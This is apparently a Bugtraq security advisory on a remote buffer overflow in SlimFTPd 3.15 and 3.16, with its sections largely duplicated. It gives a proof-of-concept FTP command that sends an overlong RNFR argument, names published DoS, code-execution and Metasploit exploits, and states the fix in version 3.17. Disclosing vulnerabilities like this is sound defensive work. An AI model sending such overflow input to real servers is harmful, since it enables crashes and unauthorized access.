WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability
BID:14339
Info
WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 14339 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 21 2005 12:00AM |
| Updated: | Jul 21 2005 12:00AM |
| Credit: | Discovery is credited to Raphael Rigo <[email protected]>. |
| Vulnerable: |
WhitSoft SlimFTPd 3.16 WhitSoft SlimFTPd 3.15 |
| Not Vulnerable: |
WhitSoft SlimFTPd 3.17 |
Discussion
WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability
A remote buffer overflow vulnerability affects WhitSoft Development SlimFTPd.
The problem presents itself when an authenticated user issues a command with excessive string values as parameters.
An attacker can leverage this issue to execute arbitrary machine code with the privileges of the affected FTP server, facilitating unauthorized access to the vulnerable computer.
A remote buffer overflow vulnerability affects WhitSoft Development SlimFTPd.
The problem presents itself when an authenticated user issues a command with excessive string values as parameters.
An attacker can leverage this issue to execute arbitrary machine code with the privileges of the affected FTP server, facilitating unauthorized access to the vulnerable computer.
Exploit / POC
WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability
A proof of concept example is available:
ftp> quote RNFR 123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345
A proof of concept denial of service exploit (47slimftpd_bof.pl) was provided by Dim K0r0l <[email protected]>.
A proof of concept remote code execution exploit (redslim-slimftpd.c) was provided by redsand <[email protected]>:
The slimftpd_list_concat.pm exploit is available for Metasploit.
A proof of concept example is available:
ftp> quote RNFR 123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345
A proof of concept denial of service exploit (47slimftpd_bof.pl) was provided by Dim K0r0l <[email protected]>.
A proof of concept remote code execution exploit (redslim-slimftpd.c) was provided by redsand <[email protected]>:
The slimftpd_list_concat.pm exploit is available for Metasploit.
Solution / Fix
WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability
Solution:
The vendor has released SlimFTPd 3.17 to address this issue.
WhitSoft SlimFTPd 3.15
WhitSoft SlimFTPd 3.16
Solution:
The vendor has released SlimFTPd 3.17 to address this issue.
WhitSoft SlimFTPd 3.15
-
WhitSoft SlimFTPd 3.17
http://www.whitsoftdev.com/files/slimftpd.zip
WhitSoft SlimFTPd 3.16
-
WhitSoft SlimFTPd 3.17
http://www.whitsoftdev.com/files/slimftpd.zip
References
WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability
References:
References:
- SlimServe HTTPd Homepage (Whitsoft)
- Arbitrary code execution in SlimFTPd v3.16 (=?ISO-8859-1?Q?Rapha=EBl_Rigo?=
)